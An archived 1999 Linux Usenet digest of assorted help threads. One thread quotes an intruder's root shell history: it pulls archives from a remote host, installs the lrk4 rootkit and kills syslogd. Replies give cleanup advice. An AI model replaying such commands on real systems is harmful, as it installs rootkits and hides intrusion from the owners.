Linux-Misc Digest #726, Volume #21                Wed, 8 Sep 99 13:13:18 EDT

Contents:
  Re: acurate timing ("Norm Dresner")
  Re: Current Linux Users (Terry Porter)
  Re: Best language for graphical apps? (J Alex Stark)
  Please help - is this logging problem timezone related? ("Sam")
  Re: Looking for writers about Linux.... (Norman Levin)
  Re: More browser windows?! (Stuart R. Fuller)
  Re: tik keeps breaking (Stuart R. Fuller)
  What to do when you've been hacked ("William T. Trotter")
  Re: SCSI device repsonds multiple times during boot with Adaptec AVA-1501  (Stuart
R. Fuller)
  Re: [Q] Scsi disk adding ? (Stuart R. Fuller)
  Re: D-Link DFE 530TX (LhD Administrator)
  Re: I WANT TO DITCH WINDOZE BUT I CANT!!! ([EMAIL PROTECTED])
  BOOT_TIME in utmp ([EMAIL PROTECTED])
  weird: /dev/hda missing during lilo install (Simon Oosthoek)
  Re: What is best HTML Editor for LINUX? (Jon Skeet)
  Re: garbage collection (Darren Spiteri)
  Re: What to do when you've been hacked (Stuart R. Fuller)
  Re: ATAPI CD burning? ("Alexander Mundy")
  Re: Please help - is this logging problem timezone related? (Charles E Taylor IV)
  Re: What to do when you've been hacked (Bill Unruh)
  Re: General Rant from a Linux Newbie (Matthias Warkus)
  Re: What is best HTML Editor for LINUX? (Jeffrey C. Dege)
  Boot Problems/Dumb Terminal -- (Dave)

From: "Norm Dresner" <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.development.system,comp.os.linux
Subject: Re: acurate timing
Date: 8 Sep 1999 12:47:25 GMT

Virginie Galtier <[EMAIL PROTECTED]> wrote in article
<[EMAIL PROTECTED]>...
> Hi
>
> Is it possible to know the time spent by a process into the processor
> with a better accuracy than jiffies (100 jiffies in one second)?
>
> Virginie

The obvious answer is "Of course," but therein lies a tale (or three).

Ignore hardware, for a moment, you still have recourse to statistics:  If
you average the results of N trials, you improve your resolution by
sqrt(N).  Thus, if you average 100 time-trials, the average has .1*jiffies
accuracy.

Also, if the duration of the process you're trying to time is less than (or
even on the same order of magnitude as) a jiffy, you could always run
several instances of the process in a loop and divide by the loop count
(you did remember to subtract the loop overhead, didn't you?).

I've used variations on these techniques for years to derive timing for
C/assambly functions that are accurate to .1 uSeconds.  Of course, you need
patience to let the process run for, perhaps, tens of thousands of trials,
but then you're only doing this once, right?

Now for the hardware answers.  In out-of-the-box linux, the answer is -- in
a word -- NO.  But since you have an open source system, there's no reason
why you can't change the value of a jiffy and thereby increase your
resolution.    If you're interested in traveling this route, look at
/usr/include/asm/param.h where the value of HZ is defined.

Norm

------------------------------

From: [EMAIL PROTECTED] (Terry Porter)
Subject: Re: Current Linux Users
Date: 8 Sep 1999 20:58:14 +0800

On Tue, 07 Sep 1999 15:39:26 GMT,
Christopher Michael Collins <[EMAIL PROTECTED]> wrote:
>Kerry J. Cox <[EMAIL PROTECTED]> wrote:
>>At the risk of starting a rather large thread, I have a few questions
>>about the Linux user community.  Does anyone know what the current
>>number of Linux users is?
>
>Well let's start a list:
>
>Chris Collins  #1
Terry Porter #2 (Registration Number: 103931)

>;)
;-)

>--
>--Chris

Kind Regards
Terry
--
**** To reach me, use [EMAIL PROTECTED]  ****
   My Desktop is powered by GNU-LINUX, and has been

------------------------------

From: J Alex Stark <[EMAIL PROTECTED]>
Crossposted-To: comp.os.linux.x
Subject: Re: Best language for graphical apps?
Date: Wed, 08 Sep 1999 13:04:56 GMT

In article <Uqiy3.7129$[EMAIL PROTECTED]>,
  "Adam C. Emerson" <[EMAIL PROTECTED]> wrote:
> In comp.os.linux.misc Sean <[EMAIL PROTECTED]> wrote:
> > I wrote an app for windows and now I want to write a Linux version.
I am a
> > Linux newbie and I don't know hoe to use GTK or any X library for
C.  But
> > if it's only for an app that sets enviroment variables it doesn't
need the
> > speed of C and I'm not really good in C anyways.  But what language
is the
> > easiest to write GUI apps?  Preferably with a graphical frontend.  I
want
> > to code this app as fast as possible.  It doesn't need to be fast or
> > small.  I just want it to look good and be easy.
>
> Well, guile is nice, if you want to take the time to learn GTK.
> But for something fast and easy you could go for Perl+Tk or
> TCL+Tk.
>
> --
> Adam C. Emerson                                    [EMAIL PROTECTED]

Cryptic reply, retyped thanks to the incompetence of deja.com:
Remember to copy your text into another window before going anywhere
near the preview or send buttons with this garbage!!!!!

I have experience with guile, tcl, perl, tk,...

IMHO:
The syntax of tcl is superficially appealing, but turns out to be
   frustrating later on;
The syntax of perl would appeal to an Egyptian;
The syntax of guile is frightening at first, but is ultimately more
   pleasing in a high-level Von Neumann sense.

Guile may get easier with some syntax converters, it gets pretty bad
when you use arrays with standard guile (scheme).

The widgets in tk are easy at first, but are very limiting.
The widgets in gtk are fairly comprehensive, and you have the option
of developing fast compiled code later on.

The problem is that bindings for gtk in scripting languages are somewhat
limited.  Guile-gtk is promising but not yet fully developed.

/Alex

--
J Alex Stark
National Institute of Statistical Sciences

From: "Sam" <[EMAIL PROTECTED]>
Subject: Please help - is this logging problem timezone related?
Date: Wed, 8 Sep 1999 15:48:04 +0300

Hallo,

I recently got a box pre-installed with RedHat 5.2.....according to
installation documentation, it was set to the correct timezone here +0300
GMT. When I do a system date query, it indicates the right time and zone.

I run RADIUS on the box and I've noticed that the time indicated on radius
logging information is 3 hours behind. A check on the messages file shows
that though named & sendmail logs have the correct time, any SYSLOG records
are 3 hours behind.

Using hwclock indicates it is 3 hours behind system date.....but as far as I
can tell its picking UTC as false during startup. I run linuxconf, check
date settings....GMT disabled and no timezone....I put in timezone settings
but linuxconf can't activate changes due to an error when running lilo. I
quit, and synchronised hwclock with system date. No change in logging info.
As a test, I manipulated startup scripts to set UTC to true. Upon rebooting,
hwclock shows right date&time, but system time is 3 hours ahead...which
shows its picking right timezone.
I disable UTC (as should be) and both hwclock and system are synchronised.
But my logs are still 3 hours behind......I must be missing something
here....any ideas?

Thanks,
Samuel.

------------------------------

Date: Wed, 08 Sep 1999 08:39:14 -0400
From: Norman Levin <[EMAIL PROTECTED]>
Subject: Re: Looking for writers about Linux....

Storm wrote:

> Recently my partner has started a new page at linux.mindbase.net, it's in the setup
>phase and hasn't been advertised or any promo.  This is my problem, I use Linux alot
>as a consultant for the company, so he thinks I can write articles about linux.  I'm
>not even close in being a writer!  So, I'm going to give this a shot, But I am
>looking for anyone out there that would be willing to write for us or just to offer
>suggestions on topics and so on.

Steve, it looks like everybody is getting into a web page for linux.  Perhaps
to much is TOOOOOooooooo much?   Maybe you should just have some urls to other
good sites?  That way you don't feel like you have to fill a page with article
after article?

ps - why did I get three transmission errors say "cant cross post to
non-existant
sites" ?
--
Norman Levin
vm/dynAmIX inc.

------------------------------

From: [EMAIL PROTECTED] (Stuart R. Fuller)
Subject: Re: More browser windows?!
Crossposted-To: linux.redhat.misc
Date: Wed, 08 Sep 1999 14:10:02 GMT

kev ([EMAIL PROTECTED]) wrote:
: Why do I have a limit of 2 browser windows on Netscape 4.6?
:

What causes you to think you have a limit of 2 browser windows?  How are you
starting browser windows?  I find that if I use "ALT-N", I get as many of them
as I care to look at.

        Stu

------------------------------

From: [EMAIL PROTECTED] (Stuart R. Fuller)
Subject: Re: tik keeps breaking
Crossposted-To: linux.redhat.misc
Date: Wed, 08 Sep 1999 14:10:02 GMT

kev ([EMAIL PROTECTED]) wrote:
: Hi,
:
: This happens often: I have tik (AOL instant messenger) up all day, then
: go home after work. I come in the next day, and tik has disconnected
: from the service, and is just sat there with my username an password
: already typed in. I press return to try and connect again. I get a
: dialog box saying "Error! Socket error." with a title "Error in TCL
: script". There are three buttons in the dialog - "OK", "Skip Messages"
: and "Stack Trace". Pressing the latter option gives the following:
:
: Socket Error!
:     while executing
: "error "Socket Error!""
:     (procedure "sflap::connect" line 49)
:     invoked from within
: "sflap::connect [normalize $connName] $tochost $tocport [normalize $sn]
: $proxy"
:     (procedure "toc_open" line 5)
:     invoked from within
: "toc_open $::NSCREENNAME $::TOC($toc,host) $::TOC($toc,port)
: $::AUTH($auth,host) $::AUTH($auth,port)  $::NSCREENNAME $::PASSWORD
: english $::REVISION  ..."
:     (procedure "tik_signon" line 33)
:     invoked from within
: "tik_signon "
:     (command bound to event)
:
:
: Any idea what's going on?
: How to stop it doing this without re-logging in?

Maybe the IM host disconnected you for some reason?  Maybe the IM host
crashed?  Maybe the network path to the IM host went down?

        Stu

------------------------------

From: "William T. Trotter" <[EMAIL PROTECTED]>
Subject: What to do when you've been hacked
Date: Wed, 08 Sep 1999 13:03:21 GMT

Help needed.  My Linux box (RedHat 6.0) was hacked
over the labor day weekend.  Someone accessed my
machine as root, downloaded and installed some software.
Below I list an extract from .bash_history file for root.
My question is what do I have to do to clean up.  Changing
all passwords is a start, but what else.  Is a total reinstall
necessary?  Responses here as well as by email appreciated.
Tom Trotter
[EMAIL PROTECTED]

cd /tmp
ps aux
locate sshd
rcp [EMAIL PROTECTED]:q3.tar.gz ./
rcp [EMAIL PROTECTED]:*.rpm ./
cd /tmp
ls -al
rcp [EMAIL PROTECTED]:get am-utils-6.0.1s11-1.6.0.i386.rpm ./
rm -rf *rpm
rcp [EMAIL PROTECTED]:get am-utils-6.0.1s11-1.6.0.i386.rpm ./
exit
cd /tmp
am-utils-6.0.1s11-1.6.0.i386.rpm
rcp [EMAIL PROTECTED]:am-utils-6.0.1s11-1.6.0.i386.rpm ./
tar -xzvf q3.tar.gz
cd lrk4
make install
chmod +x ssh
killall -9 /usr/sbin/syslogd
make install
kill -9 /usr/sbin/inetd
killall -9 /usr/sbin/inetd
make install
/usr/sbin/inetd
ps aux
exit

------------------------------

From: [EMAIL PROTECTED] (Stuart R. Fuller)
Subject: Re: SCSI device repsonds multiple times during boot with Adaptec AVA-1501
Date: Wed, 08 Sep 1999 14:10:02 GMT

Harry Werkman ([EMAIL PROTECTED]) wrote:
: I have a Matsushita CD-ROM drive (CR-8182 I think) that seems to repsond
: multiple times when the AVA-1505 initializes and scans the bus for
: devices
: Any ideas ?
:
: My config:
: Abit BH6 with 64Mb of memory
: 6Gb IDE Fujitsu HD
: Matsushita CD-ROM drive (CR-8182)
: ESS Solo-1 based PCI sound card
: Adaptec AVA-1501 SCSI ISA card
: Jaton-78P Riva128ZX based AGP video card with 8Mb of VRAM
: NetGear FA310-TX PCI ethenet card
: ADP 6P monitor
: Microsoft PS/2 IntelliMouse
: RedHat 6.0

SCSI devices (targets) can have multiple LUNs associated with them.  CDROMs
typically only have one LUN, LUN 0.  The SCSI controller is probing each
target looking for additional LUNs besides LUN 0.

If that doesn't answer your question, post the output from "dmesg" that shows
the multiple responses for further analysis.

        Stu

------------------------------

From: [EMAIL PROTECTED] (Stuart R. Fuller)
Subject: Re: [Q] Scsi disk adding ?
Date: Wed, 08 Sep 1999 14:10:02 GMT

Suhng ByuhngMunn ([EMAIL PROTECTED]) wrote:
: How can I add my scsi disk on linux?
:
: I have a adaptec scisi controller.

Just plug the disk in, reboot Linux and it should see the new disk.  Partition
it to suit your needs, mke2fs the partition(s), mount the partition(s) to
suitable mount point(s) and start filling them with data.

        Stu

------------------------------

From: LhD Administrator <[EMAIL PROTECTED]>
Crossposted-To: redhat.networking.general,comp.os.linux.networking
Subject: Re: D-Link DFE 530TX
Date: Wed, 08 Sep 1999 13:31:13 GMT

Raghu wrote:
> Now I want to configure D-Link DFE 530TX network card.
>
> I have no idea how to do it ,
> Can anyone help me out ???

Check out the workarounds and driver info at:
http://lhd.datapower.com/db/dispproduct.cgi?DISP?296

LhD Administrator
LhD: Linux Hardware Database
http://lhd.datapower.com

                    http://www.searchlinux.com

------------------------------

Crossposted-To: comp.os.linux.advocacy,comp.os.linux.questions
From: [EMAIL PROTECTED]
Subject: Re: I WANT TO DITCH WINDOZE BUT I CANT!!!
Date: Wed, 8 Sep 1999 14:11:29 GMT

Why?

<sarcasm>doesn't windows have everything you need?
and I've heard it's as stable as a rock!</sarcasm>

And my $ .02 to you.. post to every news group that
your server permits, you get better responses to your
answers then, and the whole world gets to know you better too..
ain't that great!

Jayan

------------------------------

From: [EMAIL PROTECTED]
Subject: BOOT_TIME in utmp
Date: Wed, 08 Sep 1999 14:20:47 GMT

I am compile on RH 6.0 Linux 2.2.5.
How come /var/run/utmp does not contain BOOT_TIME 2?
I am using getutid to get the boot time from the utmp structure,
but BOOT_TIME is not there.
Is this a configuration option, or does is not exist on Linux?

Thanks,
bborn

From: Simon Oosthoek <[EMAIL PROTECTED]>
Subject: weird: /dev/hda missing during lilo install
Date: Wed, 08 Sep 1999 16:17:52 +0200

Hi

I'm trying to install Mandrake 6 on a HP omnibook 4150. The install goes
fine until I want to install the bootloader (lilo) on the harddisk

it comes back with an error (not really specified). The mount table
looks like this:
/dev/root       /               ext2
/proc           /proc           proc
/tmp/hdc        /tmp/rhimage    iso9660
/tmp/hda1       /mnt/           ext2
/tmp/hda5       /mnt/local      ext2
/tmp/hda6       /mnt/usr        ext2

this is so weird! why /tmp/hda1, etc.?
when I look there, I can't find them. They're also not in /dev/
I've never had problems with this before (this is the 4th machine I
install mandrake 6 on).

I might be able to patch it using mkdev and some freaking, but I'd
rather know what's really wrong!

TIA

Simon

------------------------------

From: [EMAIL PROTECTED] (Jon Skeet)
Subject: Re: What is best HTML Editor for LINUX?
Date: Wed, 8 Sep 1999 15:39:04 +0100

[EMAIL PROTECTED] wrote:

> John Hasler wrote:
>
> > WYSIWYG HTML editor is an oxymoron.
>
> Hardly, I suggest you go out and learn some more about high end editors
> and site management tools before you make such a statement.

Not at all. What *you* see on your browser is likely to be very different
to what I see under *my* browser: that, in itself, is where the oxymoron
comes in. (Even if they're exactly the same browser, the window size will
change what is seen.)

Too many people design with one browser, one window size in mind: and
supposedly-WYSIWYG editors encourage this, IMO.

--
Jon Skeet - [EMAIL PROTECTED]
http://www.pobox.com/~skeet/

------------------------------

From: [EMAIL PROTECTED] (Darren Spiteri)
Crossposted-To: aus.computers.linux,alt.os.linux,alt.uu.comp.os.linux.questions
Subject: Re: garbage collection
Date: Wed, 8 Sep 1999 23:49:05 +1000

In aus.computers.linux Aaron <[EMAIL PROTECTED]> wrote:
> I notice thru xosview that my 128Mb worth of RAM gets eaten up pretty
> fast, esp when Netscape Communicator is running.  but shutting down
> netscape components & many other progs dun seem to release the mem back
> to the original state when I 1st startx (& I keep it running for days).
> more than half is being used for buffering & caching.  I'm very sure
> Linux has better mem management than Windows, so how can I free up those
> areas?.

Have you got something better to do with it? :) Netscape eats a lot of RAM,
and Linux' smart memory management will make the most of any free RAM if it's
being underutilized. If things were getting tighter, then you'd find that
caching would reduce, losing some performance.
--
+-\___  ___  ______   __ __/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\=/=\-+
: / __)| _ \||_   _| /__/_/  NOTE: Above email address is fictitious.  :

------------------------------

From: [EMAIL PROTECTED] (Stuart R. Fuller)
Subject: Re: What to do when you've been hacked
Date: Wed, 08 Sep 1999 15:10:01 GMT

William T. Trotter ([EMAIL PROTECTED]) wrote:
: Help needed.  My Linux box (RedHat 6.0) was hacked
: over the labor day weekend.  Someone accessed my
: machine as root, downloaded and installed some software.
: Below I list an extract from .bash_history file for root.
: My question is what do I have to do to clean up.  Changing
: all passwords is a start, but what else.  Is a total reinstall
: necessary?  Responses here as well as by email appreciated.

I'd re-install from known secure sources (your distribution CD?), or restore
from backups performed prior to the break-in.  The reason for re-installing is
due to the fact that unless you know *everything* that was changed during the
break-in, you can can never be sure you have completely cleaned up.

        Stu

------------------------------

From: "Alexander Mundy" <[EMAIL PROTECTED]>
Subject: Re: ATAPI CD burning?
Date: Wed, 8 Sep 1999 10:15:44 -0400

Tony....
When the system boots, it recognizes my regular CD Reader and my Writer
about 6 times each.  If it is not too much trouble, could you give me a set
of steps that I need to take to get the kernel configured and how I go about
mounting each afterwards?  I am not even remotely close to being a linux
expert (but trying hard though).
-AM

news:[EMAIL PROTECTED]...

------------------------------

From: [EMAIL PROTECTED] (Charles E Taylor IV)
Date: Wed, 8 Sep 1999 11:14:55 -0400

In article <[EMAIL PROTECTED]>,
        "Sam" <[EMAIL PROTECTED]> writes:

> I run RADIUS on the box and I've noticed that the time indicated on radius
> logging information is 3 hours behind. A check on the messages file shows
> that though named & sendmail logs have the correct time, any SYSLOG records
> are 3 hours behind.

This might sound silly, but try making a symbolic link "zoneinfo" in
/usr/lib to /usr/share/zoneinfo

I had to do this to make several programs (like FTP logging and WABI)
report the time correctly.

Charles E Taylor IV <[EMAIL PROTECTED]>
Visit me on the web!
http://orangesherbert.ces.clemson.edu

From: [EMAIL PROTECTED] (Bill Unruh)
Date: 8 Sep 1999 16:10:44 GMT

In <t8tB3.4$[EMAIL PROTECTED]> "William T. Trotter" <[EMAIL PROTECTED]>
writes:

[...]

]w
]exit

Yes, you have been hacked. Yes, you need to reinstall.
HOwever, you might want to look around to see what happened.
a) Remoe your machine from the net-- there is no point to keeping
yourself open to continued reinfection.
Unmount all nfs mounted filesystems first.
b) try doing rpm -Va>/tmp/verify to see whch files were changed (ie the ones with a
5 in the third place) Many of these will be configurationfiles which are
naturally changed, but a number will be things like find, ps ls
telnetd,ftp,....
Install a valid version of find from your cdrom. rebuild your locate
database (updatedb), and look for directories like ..., ' .' '. ' (ie .
with a space infront or back) etc. Also look for /dev directories.
c) Do a find looking for suid root programs.
d) Look for new users in /etc/password.

Then once you have slacked your curiosity, if you have a CDwriter, write
a CD containing the operating system from your ssytem so that you can in
future look at more to see what they did.

e) Then reinstall the whole operating system. Save your configuration
information. (ie most of the stuff in /etc)
f)Then go to the distributor of your distribution and download ALL of
the updates and install them. In future keep doing this say once every
two weeks.

------------------------------

From: [EMAIL PROTECTED] (Matthias Warkus)
Crossposted-To: comp.os.linux.advocacy
Subject: Re: General Rant from a Linux Newbie
Date: Tue, 7 Sep 1999 19:49:38 +0200

It was the 7 Sep 1999 17:03:06 GMT...
..and Darren Winsper <[EMAIL PROTECTED]> wrote:

> > > Thank God, I thought I was a freak or something ;)
> >
> > :)) At the moment, I'm recompiling my entire collection of Gnome CVS
> > modules after having intentionally zapped /opt/gnome totally.
>
> Every time I pull out the latest CVS modules, the ./autogen.sh freaks
> out with all sorts of errors.  I've given up for now, since I'll be
> installing Debian this weekend (Yes, I'm finally graduating ;] ), I'll
> try again once I have that up and running.

Install the most recent hand-compiled versions of automake, autoconf
and gettext if you want to go to the trouble of having that kind of
industrial-grade build-control stuff working on your machine.

> > I build
> > everything cleanly with --disable-static, and, oh miracle of miracles,
> > I've got a complete Gnome installation in less than 30 megabytes.
> > (That includes translations in about 20 languages, though :).
>
> Impressive :).  I've got all sorts of crap hanging around that I
> really should clean out.  It's a habit from my RISC OS days.  Even in
> 1996, I couldn't get my 500MB SCSI drive above 200MB full, so I
> started stick all sorts of junk all over the place.  The problem is,
> there's so much Linux software that I'm filling up too quickly.

Exactly my problem. I'm quite rapidly filling up a 10.1 gigabyte
drive, though...

mawa
--
There seems to be a leak in reality.
                                                -- [EMAIL PROTECTED]

------------------------------

From: [EMAIL PROTECTED] (Jeffrey C. Dege)
Date: Wed, 08 Sep 1999 16:15:08 GMT

On Wed, 8 Sep 1999 15:39:04 +0100, Jon Skeet <[EMAIL PROTECTED]> wrote:
>[EMAIL PROTECTED] wrote:
>
>> John Hasler wrote:
>>
>> > WYSIWYG HTML editor is an oxymoron.
>>
>> Hardly, I suggest you go out and learn some more about high end editors
>> and site management tools before you make such a statement.
>
>Not at all. What *you* see on your browser is likely to be very different
>to what I see under *my* browser: that, in itself, is where the oxymoron
>comes in. (Even if they're exactly the same browser, the window size will
>change what is seen.)
>
>Too many people design with one browser, one window size in mind: and
>supposedly-WYSIWYG editors encourage this, IMO.

Do you suppose we'll ever see an html editor that allows you to preview
what a page will look like rendered in plain ascii, rich text, and
full graphics at assorted window sizes and color depths?

It might help the idiots who think that html is a page description
language.

--
The use of COBOL cripples the mind; its teaching should, therefore, be
regarded as a criminal offence.

------------------------------

From: Dave <[EMAIL PROTECTED]>
Subject: Boot Problems/Dumb Terminal --
Date: Wed, 08 Sep 1999 11:37:28 -0400

        Working with RedHat 6.0 when booting I find that the 'system logger'
fails to load, and a 'execvp no such file or directory' message is
displayed, then AMD also fails to load. After boot is complete and I
telnet into the box I am consistantly hounded by messages like these =

        1.$>pine
                Your terminal of type "dumb", is lacking functions needed to run pine.

        2.$>pico temp
                Incomplete terminfo entry

        3.$>elm
        Your terminal does not support the "clear screen" function (cl)
        Your terminal does not support the "clear to end of line function (ce)
        Your terminal does not support the "clear to end of desplay function
(cd)
        Your terminal does not support the "cursor motion" function (cm)
        your terminal does not support the "move cursor up" function (cm)
        your terminal does not support the "move cursor right" function (nd)

        4.$>info term
        info: Terminal type "dumb" is not smart enough to run info.

        When logging in directly from the terminal I have no problems. This
only happens when I telnet to the system from a remote location.
This problem was not happening for the first month of activity, and I am
not aware of doing anything that could have caused it except having to
restart due to the system not accepting requests for login via telnet,
from the terminal it would telnet out but wouldn't accept request for
connection from outside.

        $>set term=vt100
        does nothing to help

        Could this be related to the System Logger, and AMD failing on boot or
the execvp file not being found? How would I over come these type of
failures on boot, and or correct the "dumb" terminal faults?

        Any help or suggestions would be greatly appreciated. Reply to
[EMAIL PROTECTED]    Thank you in advance.  Dave